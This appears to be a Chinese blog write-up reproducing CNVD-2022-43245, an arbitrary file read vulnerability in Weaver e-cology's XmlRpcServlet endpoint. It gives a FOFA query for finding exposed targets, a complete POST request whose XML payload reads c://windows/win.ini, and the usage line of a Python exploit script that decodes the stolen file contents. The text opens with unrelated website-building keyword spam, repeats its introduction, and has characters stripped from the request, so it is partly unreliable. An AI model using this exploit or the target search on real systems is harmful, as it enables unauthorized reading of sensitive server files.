衡水龙华的网站建设,打开百度一下你就知道,服装加工厂网站建设方案计划书,网站购物功能如何做CNVD-2022-43245 泛微e-cology XmlRpcServlet接口处存在任意文件读取漏洞#xff0c;攻击者可利用漏洞获取敏感信息。
1.漏洞级别
中危
2.影响范围
e-office 9.5 202201133.漏洞搜索
fofa 搜索 app泛微-OA#xff08;e-cology#xff09;4.漏洞复现
…CNVD-2022-43245 泛微e-cology XmlRpcServlet接口处存在任意文件读取漏洞攻击者可利用漏洞获取敏感信息。
1.漏洞级别
中危
2.影响范围
e-office 9.5 202201133.漏洞搜索
fofa 搜索 app泛微-OAe-cology4.漏洞复现
这个漏洞的复现方法很简单只需要向目标网站的XmlRpcServlet接口发送数据即可。 构造请求包
POST /weaver/org.apache.xmlrpc.webserver.XmlRpcServlet HTTP/1.1
Host: url
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:120.0) Gecko/20100101 Firefox/120.0
Accept: */*
Accept-Language: zh-CN,zh;q0.8,zh-TW;q0.7,zh-HK;q0.5,en-US;q0.3,en;q0.2
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded; charsetutf-8
X-Requested-With: XMLHttpRequest
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: close
Content-Length: 200?xml version1.0 encodingUTF-8?methodCallmethodNameWorkflowService.getAttachment/methodNameparamsparamvaluestringc://windows/win.ini/string/value/param/params/methodCall正常的响应结果如下
注下面的xml数据 元素之间不能使用tab或空格、回车会导致服务器响应错误因为在CDATA部分文本将被视为原始字符数据不会被解析器处理或解释。 这种情况下会导致异常响应如下图 上面复现成功的状态下读取到的就是数据的base64编码我们可以通过base64解密获取文件内容。
5.快捷利用
随文章附赠一个我写的漏洞复现脚本可以指定url和filepath来读取文件并直接将base64转换成正常文本。 执行
python3 ecology-xmlrpcservlet-readfile.py -u url -f file_path
#如果不选择文件地址 则默认为c://windows/win.ini执行效果如下 感兴趣的可以下载一下试试或者github直接搜索ecology-xmlrpcservlet-readfile.py就能找到相应的文件了。 如果有问题欢迎随时交流
